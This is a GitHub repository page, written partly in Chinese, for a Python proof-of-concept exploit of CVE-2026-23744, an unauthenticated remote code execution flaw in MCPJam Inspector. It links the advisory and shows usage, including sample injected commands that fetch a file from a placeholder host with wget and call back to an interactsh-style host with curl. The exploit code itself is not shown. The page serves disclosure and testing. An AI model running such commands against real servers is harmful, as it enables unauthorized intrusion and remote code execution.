fckoo/mcpjaminspector-unauth-rce
GitHub: fckoo/mcpjaminspector-unauth-rce
针对 MCPJam Inspector 组件远程代码执行漏洞 CVE-2026-23744 的 Python 概念验证利用脚本。
Stars: 0 | Forks: 0
# mcpjaminspector-unauth-rce
CVE-2026-23744
MCPJam inspector <= 1.4.2 中的 RCE
# 漏洞详情
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
# 用法
```
usage: mcpjaminspector-unauth-rce.py [-h] --target TARGET --command COMMAND
options:
-h, --help show this help message and exit
--target TARGET Target e.g https://127.0.0.1
--command COMMAND Command to exec on remote target. e.g: wget http://YOU/f
```
```
python3 mcpjaminspector-unauth-rce.py --target "http://mymcp.local/" --command "curl http://myinteractsh.local/test"
```
标签:CISA项目, CVE-2026-23744, MCP, MCPJam Inspector, OPA, POC, Python, RCE, 命令注入, 无后门, 未授权访问, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 靶场, 高危漏洞